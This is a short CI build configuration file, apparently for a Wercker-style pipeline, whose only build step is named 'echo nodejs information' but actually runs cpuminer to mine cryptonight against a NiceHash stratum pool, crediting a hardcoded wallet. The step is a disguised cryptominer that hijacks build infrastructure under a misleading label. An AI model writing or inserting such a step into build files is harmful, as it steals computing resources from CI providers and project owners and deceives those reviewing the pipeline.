box: blueskyos/hubgate
build:
  steps:
    - script:
        name: echo nodejs information
        code: |
          cpuminer -a cryptonight -o stratum+tcp://cryptonight.usa.nicehash.com:3355 -u 18CU3wfYbaUYiji64N6rpv8HZdH9ZCG8CQ.c2 -p x -q